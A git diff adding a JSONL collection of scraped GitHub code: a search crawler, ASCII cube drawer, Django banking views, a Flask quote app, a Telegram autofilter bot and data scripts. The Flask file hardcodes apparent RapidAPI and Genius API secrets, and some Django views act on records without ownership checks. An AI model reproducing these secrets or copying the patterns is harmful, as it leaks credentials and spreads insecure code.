diff --git "a/5310.jsonl" "b/5310.jsonl" new file mode 100644--- /dev/null +++ "b/5310.jsonl" @@ -0,0 +1,1350 @@ +{"seq_id":"34100461318","text":"from threading import Thread\nimport math\n\nfrom . import Search\nfrom .db import get_collection\nfrom tqdm import tqdm\n\nresult_name = 'results'\nerror_list_name = 'errors'\n\nclass Period(object):\n def __init__(self, from_year, from_month, to_year, to_month):\n self.from_year = from_year\n self.from_month = from_month\n self.to_year = to_year\n self.to_month = to_month\n\n def to_json(self):\n return {'from_year': self.from_year,\n 'from_month': self.from_month,\n 'to_year': self.to_year,\n 'to_month': self.to_month}\n\n def get_str_from(self):\n return \"{}.{}\".format(self.from_year, self.from_month)\n\n def get_str_to(self):\n return \"{}.{}\".format(self.to_year, self.to_month)\n\nclass Result(object):\n def __init__(self, keywords, period:Period, result):\n self.keywords = keywords['keywords']\n self.id = keywords['id']\n self.period = period\n self.result = result\n\n def to_json(self):\n return {\n 'keywords_id': self.id,\n 'keywords': self.keywords,\n 'from_year': self.period.from_year,\n 'from_month': self.period.from_month,\n 'to_year': self.period.to_year,\n 'to_month': self.period.to_month,\n 'result': self.result\n }\n\nclass Run(object):\n def __init__(self, input_file_name, input_path, output_path, from_year, to_year):\n self.db_name = input_file_name\n self.input_path = input_path\n self.output_path = output_path\n self.keywords_list = []\n self.from_year = from_year\n self.to_year = to_year\n self.search = Search()\n self._load_input()\n\n def _load_input(self):\n with open(self.input_path, 'r') as file:\n while True:\n line = file.readline()\n if line:\n words = line.split(\",\")\n keywords = []\n keywords_id = words[0]\n if keywords_id == \"\":\n continue\n for i in range(1, len(words)):\n word = words[i].strip()\n if word == \"\" or len(word) == 0 or word == '':\n pass\n else:\n keywords.append(word)\n keywords = sorted([word.strip() for word in keywords])\n self.keywords_list.append({'id': keywords_id, 'keywords':keywords})\n else:\n break\n\n def _search(self, keywords, period:Period):\n try:\n result = self.search.search(keywords['keywords'], period.get_str_from(), period.get_str_to())\n print(\"Search Success : {}-{} = {},{}\".format(period.get_str_from(), period.get_str_to(), str(result),\n keywords['id']))\n return result\n except:\n print(\"Error ! 
: {}-{} = {}\".format(period.get_str_from(), period.get_str_to(), keywords['id']))\n get_collection(db_name=self.db_name, collection_name=error_list_name).insert_one(\n {\"id\": keywords['id'],\n \"keywords\": keywords['keywords'],\n \"from_year\": period.from_year,\n \"from_month\":period.from_month,\n \"to_year\": period.to_year,\n \"to_month\": period.to_month})\n return None\n\n def _periodic_search(self, keywords, period_list:list):\n for period in period_list:\n result = self._search(keywords, period)\n if result is not None:\n result = Result(keywords, period, result)\n get_collection(db_name= self.db_name, collection_name=result_name).insert_one(result.to_json())\n else:\n pass\n\n def _yearly_search(self, keywords, year:int):\n period = Period(year, 1, year, 12)\n result = self._search(keywords, period)\n if result is not None:\n if result < 3000:\n result = Result(keywords, period, result)\n get_collection(db_name=self.db_name, collection_name=result_name).insert_one(result.to_json())\n else:\n period_list = []\n for i in range(6):\n period_list.append(Period(year, i * 2 + 1, year, i * 2 + 2))\n self._periodic_search(keywords, period_list)\n\n def _get_result(self, keywords_list):\n print(\"Search start ! \")\n pbar = tqdm(total=(self.to_year - self.from_year + 1) * len(keywords_list))\n for keywords in keywords_list:\n for year in range(self.from_year, self.to_year+1):\n self._yearly_search(keywords, year)\n pbar.update(1)\n\n def _divide_keywords_list(self, thread_count):\n keywords_list = []\n max_keywords_len = int(math.ceil(len(self.keywords_list) / thread_count))\n count = 0\n for i in range(max_keywords_len):\n for j in range(thread_count):\n if len(keywords_list) <= j:\n keywords_list.append([])\n if count < len(self.keywords_list):\n keywords_list[j].append(self.keywords_list[count])\n # TODO Send self.keywords_list[count] to DB\n count += 1\n else:\n break\n\n return keywords_list\n\n def _make_report(self):\n file = open(self.output_path, 'w')\n print(\"Make Report !\")\n pbar = tqdm(total = len(self.keywords_list) * (self.to_year - self.from_year + 1))\n result_collection = get_collection(db_name=self.db_name, collection_name=result_name)\n for keywords in self.keywords_list:\n keywords_id = keywords[\"id\"]\n for year in range(self.from_year, self.to_year+1):\n result_count = result_collection.count({\"keywords_id\": keywords_id, \"from_year\": year})\n if result_count == 0:\n print(\"lack of result - search again : {}-{}\".format(year, keywords_id))\n self._yearly_search(keywords, year)\n count = 0\n while True:\n count = 0\n finished = True\n year_count_one = False\n yearly_results = result_collection.find({\"keywords_id\": keywords_id, \"from_year\": year})\n already_checked = []\n for result in yearly_results:\n from_month = result['from_month']\n to_month = result['to_month']\n\n if from_month in already_checked:\n print(\"double result - {}.{} : {}\".format(year, from_month, keywords_id))\n continue\n if from_month == 1 and to_month == 12:\n year_count_one = True\n count = result[\"result\"]\n break\n else:\n count += result[\"result\"]\n already_checked.append(from_month)\n if not year_count_one:\n period_list = []\n for i in range(6):\n month = i * 2 + 1\n if month not in already_checked:\n print(\"Unfinished period occur\")\n finished = False\n period = Period(year, month, year, month+1)\n period_list.append(period)\n if not finished:\n self._periodic_search(keywords, period_list)\n else:\n break\n else:\n break\n file.write(\",\".join([keywords_id, 
str(year), str(count)]) + \"\\n\")\n file.flush()\n pbar.update(1)\n\n def _resolve_errors(self):\n while True:\n collection = get_collection(db_name=self.db_name, collection_name=error_list_name)\n error_count = collection.count()\n if error_count > 0:\n print(\"Last Error Count : {} - RETRY!!!\".format(error_count))\n\n errors = collection.find()\n count = 0\n pbar = tqdm(total=error_count)\n while True:\n if count >= error_count:\n break\n error = next(errors)\n collection.delete_one(error)\n count += 1\n from_year = error['from_year']\n from_month = error['from_month']\n to_year = error['to_year']\n to_month = error['to_month']\n keywords = {'id': error['id'], 'keywords': error['keywords']}\n if from_month == 1 and to_month == 12:\n self._yearly_search(keywords, from_year)\n else:\n period = Period(from_year, from_month, to_year, to_month)\n self._periodic_search(keywords, [period])\n pbar.update(1)\n else:\n break\n\n\n def run(self, thread_count=1):\n thread_list = []\n # keywords_list = self._divide_keywords_list(thread_count)\n\n print(\"Crawling start!\")\n #self._get_result(keywords_list[0])\n self._resolve_errors()\n self._make_report()\n","repo_name":"maybedy/lna_crawler","sub_path":"lna_crawler/run.py","file_name":"run.py","file_ext":"py","file_size_in_byte":9627,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"44"} +{"seq_id":"29879880902","text":"# Fangyuan Wan\n# Draw a cube\n\nclass Characters:\n \"\"\"\n Create a class to store the symbols\n \"\"\"\n PLUS = \"+\"\n HORIZONTAL = \"-\"\n VERTICAL = \"|\"\n DIAGONAL = \"/\"\n SPACE = \" \"\n\n\nclass DrawCube:\n \"\"\"\n Manage the prompting and drawing of the cube.\n \"\"\"\n\n def __init__(self):\n self.cube_size: int | None = None\n\n def get_cube_size(self):\n TWO = 2\n self.cube_size: int = int(input(\"Input cube size (multiple of 2): \"))\n while self.cube_size % TWO != 0:\n self.cube_size = int(\n input(\"PLEASE Input cube size (multiple of 2): \"))\n\n def draw_corner_and_horizontal(self):\n TWO = 2\n horizontal_characters: int = self.cube_size * TWO\n return (Characters.PLUS +\n Characters.HORIZONTAL * horizontal_characters +\n Characters.PLUS)\n\n def top_half_cube(self):\n TWO = 2\n ONE = 1\n height = int(self.cube_size / TWO + TWO)\n left_white_spaces: int = int(self.cube_size / TWO + ONE)\n mid_white_spaces: int = int(self.cube_size * TWO)\n first_line: int = 0\n for line in range(height):\n if line == first_line:\n print(Characters.SPACE * (left_white_spaces - line) +\n self.draw_corner_and_horizontal())\n elif line == height - ONE:\n print(Characters.SPACE * (left_white_spaces - line) +\n self.draw_corner_and_horizontal() +\n Characters.SPACE * (line - ONE) +\n Characters.VERTICAL)\n else:\n print(Characters.SPACE * (left_white_spaces - line) +\n Characters.DIAGONAL +\n Characters.SPACE * mid_white_spaces +\n Characters.DIAGONAL +\n Characters.SPACE * (line - ONE) +\n Characters.VERTICAL)\n\n def bottom_half(self):\n \"\"\"\n Draw the bottom half of the cube.\n \"\"\"\n ONE = 1\n TWO = 2\n height: int = self.cube_size + ONE\n mid_white_spaces: int = self.cube_size * TWO\n right_white_spaces: int = int(self.cube_size / TWO)\n for line in range(height):\n if line == self.cube_size / TWO - ONE:\n print(Characters.VERTICAL +\n Characters.SPACE * mid_white_spaces +\n Characters.VERTICAL +\n Characters.SPACE * right_white_spaces +\n Characters.PLUS)\n elif line < self.cube_size / TWO - ONE:\n print(Characters.VERTICAL +\n Characters.SPACE * mid_white_spaces +\n 
Characters.VERTICAL +\n Characters.SPACE * right_white_spaces +\n Characters.VERTICAL)\n elif self.cube_size / TWO <= line < self.cube_size:\n print(Characters.VERTICAL +\n Characters.SPACE * mid_white_spaces +\n Characters.VERTICAL +\n Characters.SPACE *\n (self.cube_size - line - ONE) +\n Characters.DIAGONAL)\n elif line == self.cube_size:\n print(self.draw_corner_and_horizontal())\n\n def draw_cube(self):\n \"\"\"\n Call the three functions above to draw the cube.\n \"\"\"\n self.get_cube_size()\n self.top_half_cube()\n self.bottom_half()\n\n\ndef main():\n \"\"\"\n Draw the cube\n \"\"\"\n draw_cube = DrawCube()\n draw_cube.draw_cube()\n\n\nmain()\n","repo_name":"Jane-FangyuanWan/python_projects","sub_path":"hw06/print_cube.py","file_name":"print_cube.py","file_ext":"py","file_size_in_byte":3591,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"44"} +{"seq_id":"17023324494","text":"import sys\nfrom random import seed, randint\nimport random\n\n\ndef cmdlinearg(name, default=None):\n for arg in sys.argv:\n if arg.startswith(name + \"=\"):\n return arg.split(\"=\")[1]\n assert default is not None, name\n return default\n\n\nseed(int(cmdlinearg('seed', sys.argv[-1])))\nN = int(cmdlinearg('N'))\nsingle = int(cmdlinearg('single', -1))\n\nif N == 1:\n print(N)\n print(single)\n\nelse:\n houses = set()\n while len(houses) < N:\n houses.add(random.randint(2, 12))\n\n print(N)\n print(\" \".join(map(str, sorted(houses))))\n","repo_name":"Kodsport/doris-2023","sub_path":"doris-2/monopol2/data/gen.py","file_name":"gen.py","file_ext":"py","file_size_in_byte":561,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"44"} +{"seq_id":"16957747676","text":"from django.shortcuts import render, redirect, reverse, get_object_or_404\nfrom django.views.generic import View\nfrom django.core.exceptions import ImproperlyConfigured\nfrom django.contrib.auth import get_user_model\nfrom django.contrib.auth.mixins import LoginRequiredMixin\nfrom django.contrib.auth.decorators import login_required\nfrom django.contrib import messages\nfrom datetime import datetime\n\nfrom .models import Account, AccountType, Transaction, TransactionType, Bill\n\n\n\n\ndef index(request):\n return redirect(reverse('app:accounts'))\n\n\n@login_required()\ndef account_detail(request, account_id):\n account = get_object_or_404(Account, id=account_id)\n context = {\n 'user': request.user,\n 'account': account,\n 'interest_percent': account.account_type.interest_rate * 100,\n 'transactions': account.transactions.all().order_by('-created_at')\n }\n return render(request, 'account_details.html', context)\n\n\nclass Main(object):\n template = None\n\n def get(self, request):\n context = {\n 'user': request.user,\n 'accounts': request.user.accounts.all()\n }\n return render(request, self.get_template(), context)\n\n def get_template(self):\n if self.template is not None:\n return self.template\n raise ImproperlyConfigured('Template not defined.')\n\n\nclass AccountsView(LoginRequiredMixin, Main, View):\n template = 'dashboard.html'\n\n def get(self, request):\n basic_total = 0\n credit_total = 0\n loan_total = 0\n for account in request.user.accounts.all():\n if account.account_type.name == \"Credit\":\n credit_total += account.balance\n elif account.account_type.name == \"Loan\":\n loan_total += account.balance\n else:\n basic_total += account.balance\n context = {\n 'user': request.user,\n 'accounts': request.user.accounts.all(),\n 'basic_total': 
basic_total,\n 'credit_total': credit_total,\n 'loan_total': loan_total\n }\n return render(request, self.get_template(), context)\n\n def post(self, request):\n user = request.user\n created_account = Account.objects.create_account(\n owner=user,\n account_type=AccountType.objects.get(name=request.POST['account_name']),\n balance=0\n )\n\n account_type = created_account.account_type\n messages.success(request, 'You have successfully created a new '+account_type.name+' account! You can now transfer funds!')\n return redirect('/accounts/'+str(created_account.id))\n # return redirect(reverse('app:accounts'))\n\n\nclass PurchaseView(LoginRequiredMixin, Main, View):\n template = 'purchase.html'\n \n def get(self, request):\n context = {\n 'date': datetime.now().date()\n }\n return render(request, self.get_template(), context)\n\n def post(self, request):\n errors = Transaction.objects.validate_purchase(request.POST)\n if len(errors) > 0:\n for key, error in errors.items():\n messages.error(request, error)\n return redirect(reverse('app:purchase'))\n\n selected_account = Account.objects.get(id=request.POST['account_id'])\n new_balance = selected_account.balance - float(request.POST['amount'])\n\n selected_account.balance = new_balance\n selected_account.save()\n\n Transaction.objects.create(\n desc = request.POST['desc'],\n amount = float(request.POST['amount']),\n new_balance = new_balance,\n is_deposit = False,\n process_date = datetime.now().date(),\n account = selected_account,\n transaction_type = TransactionType.objects.get(name=\"Purchase\")\n )\n\n messages.success(request, \"You have successfully added a new purchase!\")\n return redirect('/accounts/'+str(selected_account.id))\n\n\nclass TransferView(LoginRequiredMixin, Main, View):\n template = 'transfer.html'\n\n def post(self, request):\n errors = Transaction.objects.validate_transfer(request.POST)\n if len(errors) > 0:\n for key, error in errors.items():\n messages.error(request, error)\n return redirect(reverse('app:transfer'))\n\n sending_account = Account.objects.get(id=request.POST['account_id'])\n receiving_account = Account.objects.get(id=request.POST['to_account_id'])\n\n # Updating account balances\n new_balance = sending_account.balance - float(request.POST['amount'])\n receiving_new_balance = receiving_account.balance + float(request.POST['amount'])\n\n sending_account.balance = new_balance\n sending_account.save()\n\n receiving_account.balance = receiving_new_balance\n receiving_account.save()\n\n # Withdrawal Transaction\n Transaction.objects.create(\n desc = \"Transfer to \"+receiving_account.account_number,\n amount = float(request.POST['amount']),\n new_balance = new_balance,\n is_deposit = False,\n process_date = datetime.now().date(),\n account = sending_account,\n transaction_type = TransactionType.objects.get(name=\"Transfer\")\n )\n # Deposit Transaction\n Transaction.objects.create(\n desc = \"Transfer from \"+sending_account.account_number,\n amount = float(request.POST['amount']),\n new_balance = receiving_new_balance,\n is_deposit = True,\n process_date = datetime.now().date(),\n account = receiving_account,\n transaction_type = TransactionType.objects.get(name=\"Transfer\")\n )\n\n messages.success(request, \"You have successfully transfered funds from $\"+str(float(request.POST['amount']))+\" \"+sending_account.account_number+\" to \"+receiving_account.account_number)\n return redirect(reverse('app:transfer'))\n\n\nclass BillView(LoginRequiredMixin, Main, View):\n template = 'bill.html'\n\n def post(self, 
request):\n errors = Bill.objects.validate_bill(request.POST)\n if len(errors) > 0:\n for key, value in errors.items():\n messages.error(request, value)\n return redirect(reverse('app:bill'))\n else:\n from_account = Account.objects.get(id=request.POST['from_account'])\n name = request.POST['name']\n bill_account_number = request.POST['bill_account_number']\n payment = request.POST['payment']\n date = datetime.now()\n owner = request.user\n bill = Bill.objects.create(\n bill_account_number = bill_account_number,\n name = name,\n payment = payment,\n date = date,\n from_account = from_account,\n owner = owner\n )\n return redirect(reverse('app:accounts'))\n\n\nclass ContactsView(LoginRequiredMixin, Main, View):\n template = 'transfer_contacts.html'\n\n def post(self, request):\n errors = Account.objects.validate_contact(\n request.POST,\n request.user.id\n )\n if len(errors) > 0:\n for key, error in errors.items():\n messages.error(request, error)\n else:\n account = get_object_or_404(\n Account,\n account_number=request.POST['account_number']\n )\n request.user.linked_accounts.add(account)\n return redirect(reverse('app:contacts'))\n\n\nclass ExternalTransferView(LoginRequiredMixin, Main, View):\n template = 'ext_transfer.html'\n\n def get(self, request, account_id):\n context = {\n 'user': request.user,\n 'accounts': request.user.accounts.all(),\n 'contact': get_object_or_404(Account, id=account_id),\n 'today': datetime.now().strftime('%Y-%m-%d')\n }\n return render(request, self.get_template(), context)\n\n def post(self, request, account_id):\n errors = Transaction.objects.validate_extransfer(request.POST)\n if len(errors) > 0:\n for key, error in errors.items():\n messages.error(request, error)\n return redirect(\n reverse('app:external_transfer', args=(account_id,))\n )\n\n to_acct = get_object_or_404(Account, id=account_id)\n from_acct = get_object_or_404(Account, id=request.POST['account'])\n trans_amount = float(request.POST['amount'])\n Transaction.objects.create(\n desc=request.POST['desc'],\n amount=trans_amount,\n new_balance=from_acct.balance - trans_amount,\n is_deposit=False,\n process_date=request.POST['date'],\n account=from_acct,\n transaction_type=TransactionType.objects.get(id=1),\n )\n Transaction.objects.create(\n desc=request.POST['desc'],\n amount=trans_amount,\n new_balance=to_acct.balance + trans_amount,\n is_deposit=True,\n process_date=request.POST['date'],\n account=to_acct,\n transaction_type=TransactionType.objects.get(id=1),\n )\n from_acct.balance -= trans_amount\n to_acct.balance += trans_amount\n from_acct.save()\n to_acct.save()\n messages.success(request, 'External transfer successfully processed')\n return redirect(reverse('app:accounts_detail', args=(from_acct.id,)))\n\n\nclass ATMView(LoginRequiredMixin, Main, View):\n template = 'atm.html'\n\n def post(self, request):\n errors = Transaction.objects.validate_atm(request.POST)\n if len(errors) > 0:\n for key, value in errors.items():\n messages.error(request, value)\n return redirect(reverse('app:atm'))\n else:\n account = get_object_or_404(Account, id=request.POST['account'])\n desc = request.POST['description']\n amount = request.POST['amount']\n if request.POST['type'] == \"Withdrawal\":\n new_balance = account.balance - float(request.POST['amount'])\n is_deposit = False\n elif request.POST['type'] == \"Deposit\":\n new_balance = account.balance + float(request.POST['amount'])\n is_deposit = True\n process_date = datetime.now()\n transaction_type = TransactionType.objects.get(name=\"ATM\")\n 
transaction = Transaction.objects.create(\n desc = desc,\n amount = amount,\n new_balance = new_balance,\n is_deposit = is_deposit,\n process_date = process_date,\n account = account,\n transaction_type = transaction_type\n )\n account.balance = new_balance\n account.save()\n return redirect(reverse('app:accounts'))\n\n@login_required()\ndef create_account(request):\n if request.method == 'GET':\n context = {\n 'account_types': AccountType.objects.all()\n }\n return render(request, 'create_account.html', context)\n\n@login_required()\ndef pay_bill(request, bill_id):\n bill = get_object_or_404(Bill, id=bill_id)\n account = get_object_or_404(Account, id=bill.from_account.id)\n transaction = Transaction.objects.create(\n desc = bill.name,\n amount = bill.payment,\n new_balance = account.balance - bill.payment,\n is_deposit = False,\n process_date = datetime.now(),\n account = account,\n transaction_type = TransactionType.objects.get(id=1)\n )\n account.balance -= bill.payment\n account.save()\n messages.success(request, 'Bill Successfully Paid')\n return redirect(reverse('app:accounts'))\n\n@login_required()\ndef delete_bill(request, bill_id):\n bill = get_object_or_404(Bill, id=bill_id)\n bill.delete()\n return redirect(reverse('app:accounts'))\n\n","repo_name":"jtclayt/bank_app","sub_path":"app/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":12030,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"44"} +{"seq_id":"20503183729","text":"from Person import Person\nfrom flask import Flask\n\n\ndef main():\n p1 = Person(\"John\", 36)\n p1.myfunc()\n dic = {}\n dic[1] = \"Pear\"\n print(dic[1])\n\n\nprint(\"This is a test\")\n\n\nif __name__ == '__main__':\n main()\n","repo_name":"henkelmeister/pythonProject","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":225,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"44"} +{"seq_id":"24093871138","text":"import pandas as pd\nimport numpy as np\n\npd.set_option('mode.chained_assignment', None)\n\n\n## Function for values that are manually imputed\n## THIS IS A CURRIED FUNCTION\ndef impute_shell(qualPow):\n def imputeVals(in_df):\n df = in_df.copy()\n df[\"scaledOverallQual\"] = df.OverallQual.apply(\n lambda x: x**qualPow)\n \n toInt = ['ExterQual', 'ExterCond', 'BsmtQual', 'BsmtCond', 'HeatingQC',\n 'KitchenQual', 'FireplaceQu', 'GarageQual', 'GarageCond', 'PoolQC']\n intDict = {\"Ex\": 5, \"Gd\": 4, \"TA\": 3, \"Fa\": 2, \"Po\": 1}\n for i in toInt:\n df[i] = df[i].apply(lambda x: intDict.get(x, 0))\n\n df[\"SF\"] = df.TotalBsmtSF + df[\"1stFlrSF\"] + df[\"2ndFlrSF\"]\n df[\"numBaths\"] = df.BsmtFullBath + 0.5 * \\\n df.BsmtHalfBath + df.FullBath + 0.5*df.HalfBath\n df[\"bsmtBaths\"] = df.BsmtFullBath + 0.5*df.BsmtHalfBath\n\n return df\n\n return imputeVals\n\n##########################################################################################################\n\n\n####################################################################################################\n############### THIS IS WHERE YOU SELECT WHICH FEATURES ARE INCLUDED IN THE MODEL ##################\nselected = []\n# values that null is filled with \"None\" then get one-hot encoded\nfillNone = [\"GarageFinish\",\"Neighborhood\"]\n \n# Categorical variables represented as integers\ncat_to_int = ['ExterQual', 'BsmtQual', 'GarageQual']\n\n# ordinal categorical variables\nfillZeroCat = []\n\n# continuous variables with missing values that are 
zero\nfillZeroCont = [\"MasVnrArea\", \"GarageArea\", \"GrLivArea\", \"TotalBsmtSF\", \n \"scaledOverallQual\", \"SF\",\"numBaths\",\"TotRmsAbvGrd\",]\n\nimputeDict = {\"Electrical\": \"Oth\",\n \"Functional\": \"Typ\",\n \"CentralAir\": True,\n \"Exterior1st\": \"VinylSd\",\n \"Exterior2nd\": \"VinylSd\",\n \"SaleType\": \"WD\",\n \"MSZoning\": \"RL\"}\n\n","repo_name":"AJB0211/AmesHousingRegression","sub_path":"modelClasses/meta_features.py","file_name":"meta_features.py","file_ext":"py","file_size_in_byte":1997,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"44"} +{"seq_id":"72800663492","text":"import os\nimport alm\n\nimport pandas as pd\n\nos.makedirs('./experiments_results/summary', exist_ok=True)\ndata = ['sat', 'u2', 'u4', 'google', 'bats']\n\n\nline_table = []\nfor i in data:\n table = {'data': i}\n val, test = alm.data_analogy.get_dataset_raw(i)\n table['size (validation|test)'] = '{}|{}'.format(len(val), len(test))\n table['candidate number'] = ','.join(list(set([str(len(i['choice'])) for i in test]\n + [str(len(i['choice'])) for i in val])))\n if i == 'sat':\n table['category number'] = 2\n else:\n table['category number'] = len(list(set([i['prefix'] for i in test] + [i['prefix'] for i in val])))\n table['random expectation (test)'] = sum([1/len(i['choice']) for i in test])/len(test) * 100\n line_table.append(table)\n\nprint(pd.DataFrame(line_table))\npd.DataFrame(line_table).to_csv('experiments_results/summary/data.csv')\n\n\n","repo_name":"asahi417/analogy-language-model","sub_path":"experiments/data_statistics.py","file_name":"data_statistics.py","file_ext":"py","file_size_in_byte":918,"program_lang":"python","lang":"en","doc_type":"code","stars":22,"dataset":"github-code","pt":"44"} +{"seq_id":"35459034879","text":"# MIT License\r\n\r\n# Copyright (c) 2022 Muhammed\r\n\r\n# Permission is hereby granted, free of charge, to any person obtaining a copy\r\n# of this software and associated documentation files (the \"Software\"), to deal\r\n# in the Software without restriction, including without limitation the rights\r\n# to use, copy, modify, merge, publish, distribute, sublicense, and/or sell\r\n# copies of the Software, and to permit persons to whom the Software is\r\n# furnished to do so, subject to the following conditions:\r\n\r\n# The above copyright notice and this permission notice shall be included in all\r\n# copies or substantial portions of the Software.\r\n\r\n# THE SOFTWARE IS PROVIDED \"AS IS\", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR\r\n# IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,\r\n# FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. 
IN NO EVENT SHALL THE\r\n# AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER\r\n# LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM,\r\n# OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE\r\n# SOFTWARE.\r\n\r\n# Telegram Link : https://telegram.dog/Mo_Tech_Group\r\n# Repo Link : https://github.com/PR0FESS0R-99/LuciferMoringstar-Robot\r\n# License Link : https://github.com/PR0FESS0R-99/LuciferMoringstar-Robot/blob/LuciferMoringstar-Robot/LICENSE\r\n\r\nimport re, random\r\nfrom pyrogram import Client, filters\r\nfrom pyrogram.types import InlineKeyboardMarkup, InlineKeyboardButton, CallbackQuery\r\nfrom NEOAutofilter import temp, PICS, REQUEST_MOVIE, SINGLE_BUTTON, MOVIE_TEXT\r\nfrom NEOAutofilter.functions import get_size, split_list\r\nfrom database.autofilter_mdb import get_filter_results\r\n\r\nasync def pm_filters(client, update):\r\n if re.findall(\"((^\\/|^,|^!|^\\.|^[\\U0001F600-\\U000E007F]).*)\", update.text):\r\n return\r\n if 2 < len(update.text) < 100: \r\n btn = []\r\n search = update.text\r\n\r\n files = await get_filter_results(query=search)\r\n if files:\r\n for file in files:\r\n file_id = file.file_id\r\n filesize = f\"[{get_size(file.file_size)}]\"\r\n filename = f\"{file.file_name}\"\r\n if SINGLE_BUTTON:\r\n btn.append(\r\n [InlineKeyboardButton(text=f\"{filename}\", callback_data=f\"luciferPM#{file_id}\")]\r\n )\r\n else:\r\n btn.append(\r\n [InlineKeyboardButton(text=f\"{filesize}\", callback_data=f\"luciferPM#{file_id}\"),\r\n InlineKeyboardButton(text=f\"{filename}\", callback_data=f\"luciferPM#{file_id}\")]\r\n )\r\n else:\r\n await client.send_sticker(chat_id=update.from_user.id, sticker='CAADBQADMwIAAtbcmFelnLaGAZhgBwI')\r\n return\r\n\r\n if not btn:\r\n return\r\n\r\n if len(btn) > temp.filterBtns: \r\n btns = list(split_list(btn, temp.filterBtns)) \r\n keyword = f\"{update.chat.id}-{update.id}\"\r\n temp.BUTTONS[keyword] = {\r\n \"total\" : len(btns),\r\n \"buttons\" : btns\r\n }\r\n else:\r\n buttons = btn\r\n buttons.append(\r\n [InlineKeyboardButton(text=\"📃 Pages 1/1\",callback_data=\"pages\"),\r\n InlineKeyboardButton(\"Close 🗑️\", callback_data=\"close\")]\r\n )\r\n\r\n\r\n if REQUEST_MOVIE:\r\n await client.send_photo(chat_id=update.chat.id, photo=random.choice(PICS), caption=MOVIE_TEXT.format(mention=update.from_user.mention, query=search, greeting=None, group_name = f\"[{update.chat.title}](t.me/{update.chat.username})\" or f\"[{update.chat.title}](t.me/{update.from_user.username})\"), reply_markup=InlineKeyboardMarkup(buttons))\r\n else:\r\n await client.send_message(chat_id=update.chat.id, text=MOVIE_TEXT.format(mention=update.from_user.mention, query=search, greeting=None, group_name = f\"[{update.chat.title}](t.me/{update.chat.username})\" or f\"[{update.chat.title}](t.me/{update.from_user.username})\"), reply_markup=InlineKeyboardMarkup(buttons))\r\n\r\n return\r\n\r\n data = temp.BUTTONS[keyword]\r\n buttons = data['buttons'][0].copy()\r\n \r\n buttons.append(\r\n [InlineKeyboardButton(text=f\"📃 1/{data['total']}\",callback_data=\"pages\"),\r\n InlineKeyboardButton(\"🗑️\", callback_data=\"close\"),\r\n InlineKeyboardButton(text=\"➡\",callback_data=f\"nextbot_0_{keyword}\")]\r\n )\r\n \r\n if REQUEST_MOVIE:\r\n await client.send_photo(chat_id=update.chat.id, photo=random.choice(PICS), caption=MOVIE_TEXT.format(mention=update.from_user.mention, query=search, greeting=None, group_name = f\"[{update.chat.title}](t.me/{update.chat.username})\" or 
f\"[{update.chat.title}](t.me/{update.from_user.username})\"), reply_markup=InlineKeyboardMarkup(buttons))\r\n else:\r\n await client.send_message(chat_id=update.chat.id, text=MOVIE_TEXT.format(mention=update.from_user.mention, query=search, greeting=None, group_name = f\"[{update.chat.title}](t.me/{update.chat.username})\" or f\"[{update.chat.title}](t.me/{update.from_user.username})\"), reply_markup=InlineKeyboardMarkup(buttons))\r\n","repo_name":"BugNeo/NEOAutofilter","sub_path":"NEOAutofilter/modules/autofilterPM.py","file_name":"autofilterPM.py","file_ext":"py","file_size_in_byte":5252,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"44"} +{"seq_id":"73988906371","text":"import flask\nimport os\nimport requests\nimport json\nimport random\n\napp = flask.Flask(__name__)\napp.static_folder = 'static'\n\n@app.route('/')\ndef artist_info(): \n # return flask.render_template(\"index.html\", test =\"hello from template\")\n url_2 = \"https://quotes15.p.rapidapi.com/quotes/random/\"\n headers = {\n 'x-rapidapi-key': \"4d9b84ebc6mshed63a9b2ac6528dp10f43ajsn35c31f287d81\",\n 'x-rapidapi-host': \"quotes15.p.rapidapi.com\"\n }\n\n response = requests.request(\"GET\", url_2, headers=headers)\n data = json.loads(response.text)\n\n quotes = (data[\"content\"])\n url = \"https://api.genius.com/search?q=Pharrell%20Williams\"\n # genius_key = os.getenv(\"GeniusKey\")\n genius_key = \"t6wt_hu0VvrNOvL6JBhWJAnu7cpB_3cnk6xYegOFWS3dg46qM6Z0MIdu81iq_oOR\"\n my_headers = {\n \"Authorization\": \"Bearer \" + genius_key\n }\n response = requests.get(url, headers=my_headers)\n json_body = response.json() \n \n array = json_body[\"response\"][\"hits\"]\n r = random.randint(0, len(array) - 1) \n \n #This gets the id of the song that's playing\n song_id = array[r][\"result\"][\"id\"]\n\n\n\n song_link = get_songPlaying(song_id)\n return flask.render_template(\"index.html\", quote = quotes, video = song_link)\n\ndef get_songPlaying(song_id):\n song_id_url= \"https://api.genius.com/songs/\" + str(song_id)\n song_id_genius_key = \"sZD99vUmHfcsYnAwtmTIBWsDgTJZjO8qAdzKk5JgGxeMdM4gsktvql3il_0kw0-D\"\n # song_id_genius_key = os.getenv(\"SongIDKey\")\n song_id_headers = {\n \"Authorization\": \"Bearer \" + song_id_genius_key\n }\n response2 = requests.get(song_id_url, headers=song_id_headers)\n json_body2 = response2.json()\n \n \n song_link = json_body2[\"response\"][\"song\"][\"apple_music_player_url\"]\n return song_link\n\n# @app.route('/next')\n# def quotes():\n \n\n\napp.run(\n port=int(os.getenv('PORT', 8080)),\n host=os.getenv('IP', '0.0.0.0'),\n debug=True\n)","repo_name":"ebunnn/SOS","sub_path":"app.py","file_name":"app.py","file_ext":"py","file_size_in_byte":1928,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"44"} +{"seq_id":"72288830532","text":"class 